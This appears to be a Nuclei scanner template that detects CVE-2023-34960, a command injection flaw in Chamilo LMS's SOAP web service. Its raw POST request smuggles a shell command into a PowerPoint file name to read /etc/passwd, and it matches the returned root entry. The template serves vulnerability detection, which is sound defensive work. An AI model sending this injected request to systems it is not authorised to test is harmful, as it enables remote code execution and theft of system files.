id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.88794 epss-percentile: 0.98381 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: http.component:"Chamilo" tags: packetstorm,cve,cve2023,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 file_datafile_name`{}`.pptx'|" |cat /etc/passwd||a #service_ppt2lp_size720x540 matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022100caf55f319aa61338469cf8f9dbe745e8a509bcc3bde18d638db95f10d8435ea8022007475b4f35bfbf6702f675452a3c676f91ced6b9c8349067c9f92b3d818bea9b:922c64590222798bb761d5b6d8e72950